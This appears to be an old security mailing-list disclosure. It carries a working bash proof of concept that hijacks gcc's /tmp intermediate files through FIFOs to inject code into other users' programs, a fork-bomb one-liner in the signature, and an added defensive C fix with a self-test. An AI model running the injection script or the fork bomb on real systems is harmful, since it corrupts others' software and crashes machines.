Due to the questions about the possibility of performing 'pipe attacks', there's a *working* example of a program which appends the function printf("This program has been infected!\n"); after the declarations in the main() function to sources compiled using gcc. That IS a serious problem, isn't it? Of course, of course, this one (gcc vulnerability) can be easily patched, but gcc isn't the only vulnerable program! Ok, here it is:

--
#!/bin/bash

# Advanced gcc viral implant
# by Michal Zalewski (lcamtufat_private)
# ** EXECUTION PROHIBITED **

CC1=`find /usr/lib/gcc-lib -name cc1`
VICT=0

renice +20 $PPID >&/dev/null
cd /tmp

echo "I'm free, I'm free! Oh, I'm free..."

while :; do
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  if [ ! "$V" = "" ]; then
    mkfifo -m 666 ${V}.s &>/dev/null
    if [ -p ${V}.s ]; then
      sleep 1
      cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(">0){y=1;print "printf(\"This program has been infected!\\n\");"};{print $0}'>.lv$$.i
      $CC1 .lv$$.i
      cat ${V}.s>/dev/null
      cat .lv$$.s >${V}.s
      let VICT=VICT+1
      echo "Someone has been just trapped ($VICT)."
    fi
    rm -f .lv$$.* ${V}.s &>/dev/null
  fi
done
--

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
To iterate is human, to recurse - divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
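
Added example (not part of the original post, and not gcc's actual fix): one way a compiler driver could create its intermediate output so that a FIFO pre-created at the expected name, as the script above does in /tmp, is refused instead of written to. The function names, the directory template and the file names are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create an intermediate file (e.g. the .s output) without trusting the path:
 * O_EXCL makes open() fail if a FIFO, file or symlink already exists there. */
int open_private_output(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                 /* EEXIST: something was planted at path */
    /* Defence in depth: a regular, singly linked file that we own. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed self-test: 0 means a pre-created FIFO was refused with EEXIST
 * and a fresh name in the same private (mode 0700) directory was accepted. */
int selftest(void)
{
    char dir[] = "/tmp/ccdemoXXXXXX";  /* hypothetical template for mkdtemp */
    char fifo[64], fresh[64];
    int rc = 0, fd;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(fifo, sizeof fifo, "%s/planted.s", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.s", dir);
    if (mkfifo(fifo, 0666) != 0)       /* stands in for the pre-created pipe */
        rc = -1;
    else if (open_private_output(fifo) >= 0 || errno != EEXIST)
        rc = 1;
    else if ((fd = open_private_output(fresh)) < 0)
        rc = 2;
    else
        close(fd);
    unlink(fifo); unlink(fresh); rmdir(dir);
    return rc;
}
int main(void) { int rc = selftest(); printf("selftest: %d\n", rc); return rc != 0; }
```

Keeping intermediates in a directory made by mkdtemp (mode 0700) removes the shared /tmp namespace entirely, so other users cannot create entries next to the compiler's files in the first place.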